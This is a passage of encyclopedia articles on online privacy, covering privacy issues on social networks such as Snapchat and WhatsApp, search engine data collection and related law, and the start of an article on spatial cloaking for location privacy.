forewarned by The Ohio News Association[153]that if they have a MySpace account, it should be deleted. Eschool News warns, "Teachers, watch what you post online."[154]The ONA also posted a memo advising teachers not to join these sites. Teachers can face consequences of license revocations, suspensions, and written reprimands. TheChronicle of Higher Educationwrote an article on April 27, 2007, entitled "A MySpace Photo Costs a Student a Teaching Certificate" about Stacy Snyder.[155]She was a student ofMillersville University of Pennsylvaniawho was denied her teaching degree because of an allegedly unprofessional photo posted on MySpace, which involved her drinking with a pirate's hat on and a caption of "Drunken Pirate". As a substitute, she was given an English degree. Sites such asSgrouplesandDiasporahave attempted to introduce various forms of privacy protection into their networks, while companies likeSafe Shepherdhave created software to remove personal information from the net.[156] Certain social media sites such as Ask.fm, Whisper, and Yik Yak allow users to interact anonymously. The problem with websites such as these is that “despite safeguards that allow users to report abuse, people on the site believe they can say almost anything without fear or consequences—and they do." This is a privacy concern because users can say whatever they choose and the receiver of the message may never know who they are communicating with. Sites such as these allow for a large chance or cyberbullying or cyberstalking to occur. People seem to believe that since they can be anonymous, they have the freedom to say anything no matter how mean or malicious.[157] On July 6, 2010, Blizzard Entertainment announced that it would display the real names tied to user accounts in its game forums. On July 9, 2010, CEO and cofounder of Blizzard Mike Morhaime announced a reversal of the decision to force posters' real names to appear on Blizzard's forums. The reversal was made in response to subscriber feedback.[158] Snapchat is a mobile application created by Stanford graduates Evan Spiegel and Bobby Murphy in September 2011.[159]Snapchat's main feature is that the application allows users to send a photo or video, referred to as a "snap", to recipients of choice for up to ten seconds before it disappears.[160]If recipients of a snap try and screenshot the photo or video sent, a notification is sent to the original sender that it was screenshot and by whom. Snapchat also has a "stories" feature where users can send photos to their "story" and friends can view the story as many times as they want until it disappears after twenty-four hours. Users have the ability to make their snapchat stories viewable to all of their friends on their friends list, only specific friends, or the story can be made public and viewed by anyone that has a snapchat account.[159]In addition to the stories feature, messages can be sent through Snapchat. Messages disappear after they are opened unless manually saved by the user by holding down on the message until a "saved" notification pops up. There is no notification sent to the users that their message has been saved by the recipient, however, there is a notification sent if the message is screenshot.[161] In 2015, Snapchat updated their privacy policy, causing outrage from users because of changes in their ability to save user content.[162]These rules were put in place to help Snapchat create new and cool features like being able to replay a Snapchat, and the idea of “live” Snapchat stories. These features require saving content to snapchat servers in order to release to other users at a later time. The update stated that it has the rights to reproduce, modify, and republish photos, as well as save those photos to Snapchat servers. Users felt uncomfortable with the idea that all photo content was saved and the idea of “disappearing photos” advertised by Snapchat didn't actually disappear. There is no way to control what content is saved and what isn't. Snapchat responded to backlash by saying they needed this license to access our information in order to create new features, like the live snapchat feature.[162] With the 2015 new update of Snapchat, users are able to do “Live Stories,” which are a “collection of crowdsourced snaps for a specific event or region.”[163]By doing that, you are allowing snapchat to share your location with not just your friends, but with everyone. According to Snapchat, once you pick the option of sharing your content through a Live Story, you are providing to the company "unrestricted, worldwide, perpetual right and license to use your name, likeness, and voice in any and all media and distribution channels."[163] On Snapchat, there is a new feature that was incorporated into the app in 2017 called Snap Maps. Snap Maps allows users to track other users’ locations, but when people “first use the feature, users can select whether they want to make their location visible to all of their friends, a select group of connections or to no one at all, which Snapchat refers to as ‘ghost mode.’”[164] This feature however has raised privacy concerns because “‘It is very easy to accidentally share everything that you've got with more people than you need too, and that's the scariest portion’. Cyber security expert Charles Tendell told ABC News of the Snapchat update.”[165]For protecting younger users of Snapchat, “Experts recommend that parents stay aware of updates to apps like Snapchat. They also suggest parents make sure they know who their kids' friends are on Snapchat and also talk to their children about who they add on Snapchat.”[165] An additional concern users have with the privacy of Snapchat is the deletion of Snapchat's after 30 days. Many users become confused as to why it looks like someone has gotten into their account and opened all of their snapchat's which then increases their Snapscore. This has caused great concern over hackers getting into personal Snapchat accounts. To reassure users, Snapchat has added to their Support webpage explaining the expiration of snapchats after 30 days yet it is still very unclear. To clarify, this is exactly what happens: after 30 days, any unopened Snapchats will automatically be deleted or expire (which appears to the user as the same thing as being opened automatically). Therefore, this will change the user's Snapscore. After snaps expire, it will look like all of the snapchats have been opened, shown by many unfilled or open boxes. In 2016, Snapchat released a new product called “Snapchat Spectacles,” which are sunglasses featuring a small camera that allow users to take photos and record up to 10 seconds of footage.[166]The cameras in the Spectacles are connected to users’ existing Snapchat accounts, so they can easily upload their content to the application. This new product has received negative feedback because the Spectacles do not stand out from normal sunglasses beyond the small cameras on the lenses. Therefore, users have the ability to record strangers without them knowing. Furthermore, the simplistic design may result in people using the glasses accidentally, mistaking them for regular glasses. Critics of Snapchat Spectacles argue that this product is an invasion of privacy for the people who do not know they are being recorded by individuals who are wearing the glasses. Many people believe that these spectacles pose a risk in a way that their physical location might be disclosed to various parties, making the user vulnerable. Proponents disagree, saying that the glasses are distinguishable enough that users and people around them will notice them. Another argument in favor of the glasses is that people are already exposing themselves to similar scenarios by being in public.[166] In October 2016,Amnesty Internationalreleased a report ranking Snapchat along with ten other leading social media applications, including Facebook, iMessage, FaceTime, and Skype on how well they protect users’ privacy.[167]The report assessed Snapchat's use of encryption and found that it ranks poorly in how it usesencryptionto protect users’ security as a result of not usingend-to-end encryption. Because of this, third parties have the ability to access Snapchats while they are being transferred from one device to another. The report also claimed that Snapchat does not explicitly inform users in its privacy policy of the application's level of encryption or any threats the application may pose to users’ rights, which further reduced its overall score.[167]Regardless of this report, Snapchat is currently considered the most trustworthy social media platform among users.[168] In 2014, allegations were made against Snapchat by the Federal Trade Commission "FTC" for deceiving users on its privacy and security measures. Snapchat's main appeal is its marketed ability to have users' photos disappear completely after the one to ten second time frame—selected by the sender to the recipient—is up. However, the FTC made a case claiming this was false, making Snapchat in violation of regulations implemented to prevent deceptive consumer information. One focus of the case was that the reality of a "snap" lifespan is longer than most users perceive; the app's privacy policy stated that Snapchat itself temporarily stored all snaps sent, but neglected to offer users a time period during which snaps had yet to be permanently deleted and could still be retrieved. As a result, many third-party applications were easily created for consumers that hold the ability to save "snaps" sent by users and screenshot "snaps" without notifying the sender.[169]The FTC also claimed that Snapchat took information from its users such as location and contact information without their consent. Despite not being written in their privacy policy, Snapchat transmitted location information from mobile devices to its analytics tracking service provider.[170]Although "Snapchat's privacy policy claimed that the app collected only your email, phone number, and Facebook ID to find friends for you to connect with, if you're an IOS user and entered your phone number to find friends, Snapchat collected the names and phone numbers of all the contacts in your mobile device address books without your notice or consent."[171]It was disclosed that the Gibsonsec security group warned Snapchat of potential issues with their security, however no actions were taken to reinforce the system. In early 2014, 4.6 million matched usernames and phone numbers of users were publicly leaked, adding to the existing privacy controversy of the application.[172]Finally, the FTC claimed that Snapchat failed to secure its "find friends" feature by not requiring phone number verification in the registration process. Users could register accounts from numbers other than their own, giving users the ability to impersonate anyone they chose.[169]Snapchat had to release a public statement of apology to alert users of the misconducts and change their purpose to be a "fast and fun way to communicate with photos".[173] WhatsApp, created in 2009, is a platform that allows users to communicate via text and voice message, video chatting, and document sharing for free. WhatsApp was acquired by Facebook in 2014, but the brand continues to be promote as a secure and reliable form of communication. The app can be downloaded and used on Android, iPhone, Mac or Windows PC, and Windows Phone devices without SMS fees or charges from a carrier. While asterisks across the WhatsApp website denote some hazards of fees and additional charges, this has become a popular application for consumers that communication with people overseas.[174] In 2019, WhatsApp incorporated new privacy and security measures for their users including- Hide Muted Status and Frequently Forwarded. The hide muted status feature allows users to hide specific updates or interactions with specific users; however, if the user would decide to "unhide" their status or updates from certain users, a list of all updates will be shown to the previously blocked user (including the previously hidden status/updates). Similar to apps such as Snapchat and Instagram, users are notified when a story is forwarded, viewed, screenshotted, or shared. WhatsApp developers have added the Frequently Forwarded feature that notifies users if a message, status, or update has been forwarded 4 or more times.[175] Many social networking organizations have responded to the criticism and concerns over privacy brought up over time. It is claimed that changes to default settings, the storage of data and sharing with third parties have all been updated and corrected in the light of criticism, and/or legal challenges.[176]However, many critics remain unsatisfied, noting that fundamental changes to privacy settings in many social networking sites remain minor and at times, inaccessible, and argue that social networking companies prefer to criticize users rather than adapt their policies.[177] There are suggestions for individuals to obtain privacy by reducing or ending their own use of social media. This method does not succeed, since their information is still revealed by posts from their friends.[178] There is ambiguity about how privateIP addressesare. The Court of Justice of the European Union has ruled they need to be treated as personally identifiable information if the business receiving them, or a third party like a service provider, knows the name or street address of the IP address holder, which would be true for static IP addresses, not for dynamic addresses.[179]California regulations say IP addresses need to be treated as personal information if the business itself, not a third party, can link them to name and street address.[179][180]In 2020, An Alberta court ruled that police can obtain the IP addresses and the names and addresses associated with them, without a search warrant. An investigation found the IP addresses which initiated online crimes, and the service provider gave police the names and addresses associated with those IP addresses.[181]
https://en.wikipedia.org/wiki/Privacy_concerns_with_social_networking_services
[1]Search engine privacyis a subset ofinternet privacythat deals with user data being collected bysearch engines. Both types of privacy fall under the umbrella ofinformation privacy. Privacy concerns regarding search engines can take many forms, such as the ability for search engines to log individual search queries,browsing history,IP addresses, andcookiesof users, and conductinguser profilingin general. The collection ofpersonally identifiable information (PII)of users by search engines is referred to astracking.[1] This is controversial because search engines often claim to collect a user's data in order to better tailor results to that specific user and to provide the user with a better searching experience. However, search engines can also abuse and compromise its users'privacyby selling their data to advertisers for profit.[1]In the absence of regulations, users must decide what is more important to their search engine experience: relevance and speed of results or their privacy, and choose a search engine accordingly.[2] Thelegal framework in the United States for protecting user privacyis not very solid.[3]The most popular search engines collect personal information, but other search engines that are focused on privacy have cropped up recently. There have been several well publicized breaches of search engine user privacy that occurred with companies likeAOLandYahoo. For individuals interested in preserving their privacy, there are options available to them, such as using software likeTorwhich makes the user's location and personal information anonymous[4]or using a privacy focused search engine. Search engines generally publishprivacy policiesto inform users about what data of theirs may be collected and what purposes it may be used for. While these policies may be an attempt at transparency by search engines, many people never read them[5]and are therefore unaware of how much of their private information, like passwords and saved files, are collected fromcookiesand may be logged and kept by the search engine.[6][7]This ties in with the phenomenon of notice and consent, which is how many privacy policies are structured. Notice and consent policies essentially consist of a site showing the user a privacy policy and having them click to agree. This is intended to let the user freely decide whether or not to go ahead and use the website. This decision, however, may not actually be made so freely because the costs of opting out can be very high.[8]Another big issue with putting the privacy policy in front of users and having them accept quickly is that they are often very hard to understand, even in the unlikely case that a user decides to read them.[7]Privacy minded search engines, such asDuckDuckGo, state in their privacy policies that they collect much less data than search engines such asGoogleor Yahoo, and may not collect any.[9]As of 2008, search engines were not in the business of selling user data to third parties, though they do note in their privacy policies that they comply with government subpoenas.[8] Google, founded in 1998, is the most widely used search engine, receiving billions and billions of search queries every month.[8]Google logs all search terms in a database along with the date and time of search, browser andoperating system, IP address of user, the Google cookie, and theURLthat shows the search engine and search query.[10]The privacy policy of Google states that they pass user data on to various affiliates, subsidiaries, and "trusted" business partners.[8] Yahoo, founded in 1994, also collects user data. It is a well-known fact that users do not read privacy policies, even for services that they use daily, such asYahoo! MailandGmail.[5]This persistent failure of consumers to read these privacy policies can be disadvantageous to them because while they may not pick up on differences in the language of privacy policies, judges in court cases certainly do.[5]This means that search engine and email companies like Google and Yahoo are technically able to keep up the practice of targeting advertisements based on email content since they declare that they do so in their privacy policies.[5]A study was done to see how much consumers cared about privacy policies of Google, specificallyGmail, and their detail, and it determined that users often thought that Google's practices were somewhat intrusive but that users would not often be willing to counteract this by paying a premium for their privacy.[5] DuckDuckGo, founded in 2008, claims to be privacy focused.[11][12]DuckDuckGo does not collect or share any personal information of users, such as IP addresses or cookies,[11]which other search engines usually do log and keep for some time. It also does not have spam, and protects user privacy further by anonymizing search queries from the website the user chooses and using encryption.[11]Similarly privacy oriented search engines includeStartpage,Ecosia,Qwant,MetaGerandDisconnect.[12]MojeekandBrave Searchare privacy-focused search engines that build their own indexes. Most search engines can, and do, collect personal information about their users[1]according to their own privacy policies. This user data could be anything from location information to cookies, IP addresses, search query histories, click-through history, andonline fingerprints.[2][6][13][14]This data is often stored in large databases, and users may be assigned numbers in an attempt to provide them with anonymity. Data can be stored for an extended period of time. For example, the data collected by Google on its users is retained for up to 9 months.[15][16]Some studies state that this number is actually 18 months.[17]This data is used for various reasons such as optimizing and personalizing search results for users, targeting advertising,[8]and trying to protect users from scams and phishing attacks.[2]Such data can be collected even when a user is not logged in to their account or when using a different IP address by using cookies.[8] What search engines often do once they have collected information about a user's habits is to create a profile of them, which helps the search engine decide which links to show for different search queries submitted by that user or which ads to target them with.[13]An interesting development in this field is the invention of automated learning, also known asmachine learning. Using this, search engines can refine their profiling models to more accurately predict what any given user may want to click on by doingA/B testingof results offered to users and measuring the reactions of users.[18] Companies like Google,Netflix,YouTube, andAmazonhave all started personalizing results more and more. One notable example is how Google Scholar takes into account the publication history of a user in order to produce results it deems relevant.[1]Personalization also occurs when Amazon recommends books or whenIMDbsuggests movies by using previously collected information about a user to predict their tastes.[18]For personalization to occur, a user need not even be logged into their account.[4] Theinternet advertisingcompanyDoubleClick, which helps advertisers target users for specific ads, was bought by Google in 2008 and was a subsidiary until June 2018, when Google rebranded and merged DoubleClick into itsGoogle Marketing Platform. DoubleClick worked by depositing cookies on user's computers that would track sites they visited with DoubleClick ads on them.[10]There was a privacy concern when Google was in the process of acquiring DoubleClick that the acquisition would let Google create even more comprehensive profiles of its users since they would be collecting data about search queries and additionally tracking websites visited.[10]This could lead to users being shown ads that are increasingly effective with the use of behavioral targeting.[17]With more effective ads comes the possibility of more purchases from consumers that they may not have made otherwise. In 1994, a conflict between selling ads and relevance of results on search engines began. This was sparked by the development of the cost-per-click model, which challenged the methods of the already-created cost-per-mille model. The cost-per-click method was directly related to what users searched, whereas the cost-per-mille method was directly influenced by how much a company could pay for an ad, no matter how many times people interacted with it.[16][clarification needed] Besides ad targeting and personalization, Google also uses data collected on users to improve the quality of searches. Search result click histories and query logs are crucial in helping search engines optimize search results for individual users.[2]Search logs also help search engines in the development of the algorithms they use to return results, such as Google's well knownPageRank.[2]An example of this is how Google uses databases of information to refine Google Spell Checker.[8] There are many who believe that user profiling is a severe invasion of user privacy, and there are organizations such as theElectronic Privacy Information Center(EPIC) andPrivacy Internationalthat are focused on advocating for user privacy rights.[2][8]In fact, EPIC filed a complaint in 2007 with theFederal Trade Commissionclaiming that Google should not be able to acquire DoubleClick on the grounds that it would compromise user privacy.[8]TheOpen Search Foundationspecifically targets search engine privacy by investigating ways of making search a public, collaborative good where people can search freely without their personal data being collected and evaluated. Experiments have been done to examine consumer behavior when given information on the privacy of retailers by integrating privacy ratings with search engines.[19]Researchers used a search engine for the treatment group called Privacy Finder, which scans websites and automatically generates an icon to show the level of privacy the site will give the consumer as it compares to the privacy policies that consumer has specified that they prefer. The results of the experiment were that subjects in the treatment group, those who were using a search engine that indicated privacy levels of websites, purchased products from websites that gave them higher levels of privacy, whereas the participants in the control groups opted for the products that were simply the cheapest.[19]The study participants also were given financial incentive because they would get to keep leftover money from purchases. This study suggests that since participants had to use their own credit cards, they had a significant aversion to purchasing products from sites that did not offer the level of privacy they wanted, indicating that consumers value their privacy monetarily. Many individuals and scholars have recognized the ethical concerns regarding search engine privacy. The collection of user data by search engines can be viewed as a positive practice because it allows the search engine to personalize results.[2]This implies that users would receive more relevant results, and be shown more relevant advertisements, when their data, such as past search queries, location information, and clicks, is used to create a profile for them. Also, search engines are generally free of charge for users and can remain afloat because one of their main sources of revenue is advertising,[2]which can be more effective when targeted. This collection of user data can also be seen as an overreach by private companies for their own financial gain or as an intrusive surveillance tactic. Search engines can make money using targeted advertising because advertisers are willing to pay a premium to present their ads to the most receptive consumers. Also, when a search engine collects and catalogs large amounts of data about its users, there is the potential for it to be leaked accidentally or breached. The government can also subpoena user data from search engines when they have databases of it.[3]Search query database information may also besubpoenaedby privatelitigantsfor use in civil cases, such as divorces or employment disputes.[8] One major controversy regarding search engine privacy was theAOL search data leakof 2006. For academic and research purposes, AOL made public a list of about 20 million search queries made by about 650,000 unique users.[17]Although they assigned unique identification numbers to the users instead of attaching names to each query, it was still possible to ascertain the true identities of many users simply by analyzing what they had searched, including locations near them and names of friends and family members.[13][17]A notable example of this was how theNew York TimesidentifiedThelma Arnoldthrough "reverse searching".[8][17]Users also sometimes do "ego searches" where they search themselves to see what information about them is on the internet, making it even easier to identify supposedly anonymous users.[8]Many of the search queries released by AOL were incriminating or seemingly extremely private, such as "how to kill your wife" and "can you adopt after a suicide attempt".[8]This data has since been used in several experiments that attempt to measure the effectiveness of user privacy solutions.[1][20] Both Google and Yahoo were subjects of a Chinese hack in 2010.[21]While Google responded to the situation seriously by hiring new cybersecurity engineers and investing heavily into securing user data, Yahoo took a much more lax approach.[21]Google started paying hackers to find vulnerabilities in 2010 while it took Yahoo until 2013 to follow suit.[21]Yahoo was also identified in theSnowdendata leaks as a common hacking target for spies of various nations, and Yahoo still did not give its newly hired chief information security officer the resources to really effect change within the company.[21]In 2012, Yahoo hiredMarissa Mayer, previously a Google employee, to be the new CEO, but she chose not to invest much in the security infrastructure of Yahoo and went as far as to refuse the implementation of a basic and standard security measure to force the reset of all passwords after a breach.[21] Yahoo is known for being the subject ofmultiple breachesand hacks that have compromised large amounts of user data. As of late 2016, Yahoo had announced that at least 1.5 billion user accounts had been breached during 2013 and 2014.[21]The breach of 2013 compromised over a billion accounts while the breach of 2014 included about 500 million accounts.[21]The data compromised in the breaches included personally identifiable information such as phone numbers, email addresses, and birth dates as well as information likesecurity questions(used to reset passwords) andencryptedpasswords.[21]Yahoo made a statement saying that their breaches were a result of state sponsored actors, and in 2017, two Russian intelligence officers were indicted by theUnited States Department of Justiceas part of a conspiracy to hack Yahoo and steal user data.[21]As of 2016, the Yahoo breaches of 2013 and 2014 were the largest of all time.[21] In October 2018, there was a Google+ data breach that potentially affected about 500,000 accounts which led to the shutdown of theGoogle+platform.[22] The government may want to subpoena user data from search engines for any number of reasons, which is why it a big threat to user privacy.[2]In 2006, they wanted it as part of their defense ofCOPA, and only Google refused to comply.[8]While protecting the online privacy of children may be an honorable goal, there are concerns about whether the government should have access to such personal data to achieve it. At other times, they may want it for national security purposes; access to big databases of search queries in order to prevent terrorist attacks is a common example of this.[3][14] Whatever the reason, it is clear that the fact that search engines do create and maintain these databases of user data is what makes it possible for the government to access it.[2]Another concern regarding government access to search engine user data is "function creep", a term that here refers to how data originally collected by the government for national security purposes may eventually be used for other purposes, such as debt collection.[8]This would indicate to many a government overreach. While protections for search engine user privacy have started developing recently, the government has increasingly been on the side that wants to ensure search engines retain data, making users less protected and their data more available for anyone to subpoena.[8] A different, although popular, route for a privacy centered user to take is to simply start using a privacy oriented search engine, such as DuckDuckGo. This search engine maintains the privacy of its users by not collecting data on or tracking its users.[11]While this may sound simple, users must take into account the trade-off between privacy and relevant results when deciding to switch search engines. Results to search queries can be very different when the search engine has no search history to aid it inpersonalization. Mozillais known for its beliefs in protecting user privacy onFirefox. Mozilla Firefox users have the capability to delete the tracking cookie that Google places on their computer, making it much harder for Google to group data.[2]Firefox also has a button called "Clear Private Data",[2]which allows users to have more control over their settings.Internet Explorerusers have this option as well. When using a browser likeGoogle ChromeorSafari, users also have the option to browse in "incognito" or "private browsing" modes respectively. When in these modes, the user's browsing history and cookies are not collected.[2] The Google, Yahoo!, AOL, and MSN search engines all allow users to opt out of the behavioral targeting they use.[2]Users can also delete search and browsing history at any time. TheAsk.comsearch engine also has AskEraser, which, when used, purges user data from their servers.[2]Deleting a user's profile and history of data from search engine logs also helps protect user privacy in the event a government agency wants to subpoena it. If there are no records, there is nothing the government can access. It is important to note that simply deleting your browsing history does not delete all the information the search engine has on you, some companies do not delete the data associated with your account when you clear your browsing history. For companies that do delete user data, they usually do not delete all of it keeping records of how you used the search engine.[23] An innovative solution, proposed by researchers Viejo and Castellà-Roca, is a social network solution whereby user profiles are distorted.[15]In their plan, each user would belong to a group, or network, of people who all use the search engine. Every time somebody wanted to submit a search query, it would be passed on to another member of the group to submit on their behalf until someone submitted it. This would ideally lead to all search queries being divvied up equally between all members of the network. This way, the search engine cannot make a useful profile of any individual user in the group since it has no way to discern which query actually belonged to each user. After theGoogle Spain v. AEPDcase, it was established that people had the right to request that search engines delete personal information from their search results in compliance with other European data protection regulations. This process of simply removing certain search results is called de-listing.[24]While effective in protecting the privacy of those who wish information about them to not be accessed by anyone using a search engine, it does not necessarily protect thecontextual integrityof search results.[24]For data that is not highly sensitive or compromising, reordering search results is another option where people would be able to rank how relevant certain data is at any given point in time, which would then alter results given when someone searched their name.[24] A sort ofDIYoption for privacy minded users is to use a software like Tor, which is an anonymity network. Tor functions by encrypting user data and routing queries through thousands of relays. While this process is effective at masking IP addresses, it can slow the speed of results.[2]While Tor may work to mask IP addresses, there have also been studies that show that a simulated attacker software could still match search queries to users even when anonymized using Tor.[25][26] Unlinkability and indistinguishability are also well-known solutions to search engine privacy, although they have proven somewhat ineffective in actually providing users with anonymity from their search queries.[25]Both unlinkability and indistinguishability solutions try to anonymize search queries from the user who made them, therefore making it impossible for the search engine to definitively link a specific query with a specific user and create a useful profile on them. This can be done in a couple of different ways. Another way for the user to hide information such as their IP address from the search engine is an unlinkability solution. This is perhaps more simple and easy for the user because any user can do this by using aVPN, although it still does not guarantee total privacy from the search engine.[25] One way is for the user to use a plugin or software that generates multiple different search queries for every real search query the user makes.[25]This is an indistinguishability solution, and it functions by obscuring the real searches a user makes so that a search engine cannot tell which queries are the software's and which are the user's.[25]Then, it is more difficult for the search engine to use the data it collects on a user to do things like target ads. Being that the internet and search engines are relatively recent creations, no solid legal framework for privacy protections in terms of search engines has been put in place. However, scholars do write about the implications of existing laws on privacy in general to inform what right to privacy search engine users have. As this is a developing field of law, there have been several lawsuits with respect to the privacy search engines are expected to afford to their users. TheFourth Amendmentis well known for the protections it offers citizens from unreasonable searches and seizures, but inKatz v. United States(1967), these protections were extended to cover intrusions of privacy of individuals, in addition to simply intrusion of property and people.[3]Privacy of individuals is a broad term, but it is not hard to imagine that it includes the online privacy of an individual. TheConfrontation Clauseof theSixth Amendmentis applicable to the protection ofbig datafrom government surveillance.[14]The Confrontation Clause essentially states that defendants in criminal cases have the right to confront witnesses who provide testimonial statements.[14]If a search engine company like Google gives information to the government to prosecute a case, these witnesses are the Google employees involved in the process of selecting which data to hand over to the government. The specific employees who must be available to be confronted under the Confrontation Clause are the producer who decides what data is relevant and provides the government with what they've asked for, the Google analyst who certifies the proper collection and transmission of data, and the custodian who keeps records.[14]The data these employees of Google curate for trial use is then thought of as testimonial statement.[14]The overall effectiveness of the Confrontation Clause on search engine privacy is that it places a check on how the government can use big data and provides defendants with protection from human error.[14] This 1967 case is prominent because it established a new interpretation of privacy under the Fourth Amendment, specifically that people had a reasonable expectation of it.[3]Katz v. United Stateswas about whether or not it was constitutional for the government to listen to and record, electronically using apen register, a conversation Katz had from a public phone booth. The court ruled that it did violate the Fourth Amendment because the actions of the government were considered a "search" and that the government needed a warrant.[3]When thinking about search engine data collected about users, the way telephone communications were classified underKatz v. United Statescould be a precedent for how it should be handled. InKatz v. United States, public telephones were deemed to have a "vital role" in private communications.[3]This case took place in 1967, but surely nowadays, the internet and search engines have this vital role in private communications, and people's search queries and IP addresses can be thought of as analogous to the private phone calls placed from public booths.[3] This 1976Supreme Courtcase is relevant to search engine privacy because the court ruled that when third parties gathered or had information given to them, the Fourth Amendment was not applicable. Jayni Foley argues that the ruling ofUnited States v. Millerimplies that people cannot have an expectation of privacy when they provide information to third parties.[3]When thinking about search engine privacy, this is important because people willingly provide search engines with information in the form of their search queries and various other data points that they may not realize are being collected. In the Supreme Court caseSmith v. Marylandof 1979, the Supreme Court went off the precedent set in the 1976United States v. Millercase about assumption of risk. The court ruled that the Fourth Amendment did not prevent the government from monitoring who dialed which phone numbers by using a pen register because it did not qualify as a "search".[3] Both theUnited States v. Millerand theSmith v. Marylandcases have been used to prevent users from the privacy protections offered under the Fourth Amendment from the records thatinternet service providers(ISPs) keep.[3]This is also articulated in the Sixth CircuitGuest v. Leiscase as well as theUnited States v. Kennedycase where the courts ruled that Fourth Amendment protections did not apply to ISP customer data since they willingly provided ISPs with their information just by using the services of ISPs.[3]Similarly, the current legal structure regarding privacy and assumption of risk can be interpreted to mean that users of search engines cannot expect privacy in regards to the data they communicate by using search engines.[3] TheElectronic Communications Privacy Act(ECPA) of 1986 was passed by Congress in an effort to start creating a legal structure for privacy protections in the face of new forms of technologies, although it was by no means comprehensive because there are considerations for current technologies that Congress never imagined in 1986 and could account for.[3]The EPCA does little to regulate ISPs and mainly prevents government agencies from gathering information stored by ISPs without a warrant. What the EPCA does not do, unsurprisingly because it was enacted before internet usage became a common occurrence, is say anything about search engine privacy and the protections users are afforded in terms of their search queries.[3] The background of this 2006 case is that the government was trying to bolster its defense for theChild Online Protection Act(COPA).[8]It was doing a study to see how effective its filtering software was in regards to child pornography.[8]To do this, the government subpoenaed search data from Google, AOL, Yahoo!, and Microsoft to use in its analysis and to show that people search information that is potentially compromising to children.[3][8]This search data that the government wanted included both the URLs that appeared to users and the actual search queries of users. Of the search engines the government subpoenaed to produce search queries and URLs, only Google refused to comply with the government,[2]even after the request was reduced in size. Google itself claimed that handing over these logs was to hand over personally identifiable information and user identities.[8]The court ruled that Google had to hand over 50,000 randomly selected URLs to the government but not search queries because that could seed public distrust of the company and therefore compromise its business.[6] While not a strictly defined law enacted by Congress, the Law of Confidentiality iscommon lawthat protects information shared by a party who has trust and an expectation of privacy from the party they share the information with.[8]If the content of search queries and the logs they are stored in is thought of in the same manner as information shared with a physician, as it is similarly confidential, then it ought to be afforded the same privacy protections.[8] TheEuropean Court of Justiceruled in 2014 that its citizens had the "Right to Be Forgotten" in theGoogle Spain SL v. Agencia Española de Protección de Datoscase, which meant that they had the right to demand search engines wipe any data collected on them.[17][24]While this single court decision did not directly establish the "right to be forgotten", the court interpreted existing law to mean that people had the right to request that some information about them be wiped from search results provided by search engine companies like Google.[24]The background of this case is that one Spanish citizen, Mario Costeja Gonzalez, set out to erase himself from Google's search results because they revealed potentially compromising information about his past debts.[24]In the ruling in favor of Mario Costeja Gonzalez, the court noted that search engines can significantly impact the privacy rights of many people and that Google controlled thedisseminationof personal data.[24]This court decision did not claim that all citizens should be able to request that information about them be completely wiped from Google at any time, but rather that there are specific types of information, particularly information that is obstructing one's right to be forgotten, that do not need to be so easily accessible on search engines.[24] TheGDPRis a European regulation that was put in place to protect data and provide privacy to European citizens, regardless of whether they are physically in theEuropean Union. This means that countries around the globe have had to comply with their rules so that any European citizen residing in them is afforded the proper protections. The regulation became enforceable in May 2018.
https://en.wikipedia.org/wiki/Search_engine_privacy
Spatial cloakingis aprivacymechanism that is used to satisfy specific privacy requirements by blurring users’ exact locations into cloaked regions.[1][2]This technique is usually integrated into applications in various environments to minimize the disclosure ofprivate informationwhen users requestlocation-based service. Since thedatabase serverdoes not receive the accurate location information, a set including the satisfying solution would be sent back to the user.[1]General privacy requirements includeK-anonymity, maximum area, and minimum area.[3] With the emergence and popularity oflocation-based services, people are getting more personalized services, such as getting the names and locations of nearby restaurants and gas stations. Receiving these services requires users to send their positions either directly or indirectly to the service provider. A user's location information could be shared more than 5000 times in two weeks.[4][5]Therefore, this convenience also exposes users’ privacy to certain risks, since the attackers may illegally identify the users’ locations and even further exploit their personal information.[6][7]Continuously tracking users' location has not only been identified as a technical issue, but also a privacy concern as well.[8]It has been realized thatQuasi-identifiers, which refer to a set of information attributes, can be used to re-identify the user when linked with some external information.[7]For example, the social security number could be used to identify a specific user by adversaries,[7]and the combined disclosure of birth date, zip code, and gender can uniquely identify a user.[8]Thus, multiple solutions have been proposed to preserve and enhance users’ privacy when using location-based services. Among all the proposed mechanisms, spatial cloaking is one of those which has been widely accepted and revised, thus having been integrated into many practical applications. Location privacy is usually considered falling into the category ofinformation privacy, though there is little consensus on the definition of location privacy.[4]There are often three aspects of location information: identity, location (spatial information), and time (temporal information).[2][4]Identity usually refers to a user's name, email address, or any characteristic which makes a user distinguishable. For example,Pokémon Gorequires a consistent user identity, since users are required to log in.[4]Spatial information is considered as the main approach to determine a location.[4]Temporal information can be separated into real-time and non-real time and is usually described as a time stamp with a place.[4]If a link is established between them, then the location privacy is considered violated.[2]Accessing personal location data has been raised as a severe privacy concern, even with personal permission.[4]Therefore, privacy-aware management of location information has been identified as an essential challenge, which is designed to provide privacy protection against abuse of location information.[8]The overall idea of preserving location privacy is to introduce enough noise and quantization to reduce the chances of successful attacks.[9] Spatial crowdsourcing uses devices that has GPS (global positioning system) and collects information.[10]Data retrieved includes location data that can be used to analyze maps and local spatial characteristics.[10]In recent years, researchers have been making a connection between social aspects and technological aspects regarding location information. For example, if co-location information is considered as the data which potential attackers would get and take into consideration, the location privacy is decreased by more than 60%.[11]Also, by a constant report of a user's location information, a movement profile could be constructed for this specific user based on statistical analysis, and a large amount of information could be exploited and generated from this profile such as user's office location, medical records, financial status, and political views.[7][12]Therefore, more and more researchers have taken account of the social influence in their algorithms, since this socially networked information is accessible to the public and might be used by potential attackers. In order to meet user's requirements for location privacy in the process of data transportation, researchers have been exploring and investigating models to address the disclosure of private information.[3] The secure-multi-party model is constructed based on the idea of sharing accurate information among n parties. Each party has access to a particular segment of the precise information and at the same time being prevented from acquiring the other shares of the data.[3][13]However, the computation problem is introduced in the process, since a large amount of data processing is required to satisfy the requirement.[3] The minimal information sharing model is introduced to use cryptographic techniques to perform join and intersection operations. However, the inflexibility of this model to fit into other queries makes it hard to be satisfying to most practical applications.[3] The untrustedthird-partymodel is adopted in peer-to-peer environments.[3] The most popular model right now is the trusted third-party model. Some of the practical applications have already adopted the idea of a trusted third party into their services to preserve privacy. For example, Anonymizer is integrated into various websites, which could give anonymous surfing service to its users.[3]Also, when purchasing through PayPal, users are not required to provide their credit card information.[3]Therefore, by introducing a trusted-third-party, users’ private information is not directly exposed to the service providers.[3] The promising approach of preserving location privacy is to report data on users' behavior and at the same time protect identity and location privacy.[2]Several methods have been investigated to enhance the performances of location-preserving techniques, such as location perturbation and the report of landmark objects.[3] The idea of location perturbation is to replace the exact location information with a coarser grained spatial range, and thus 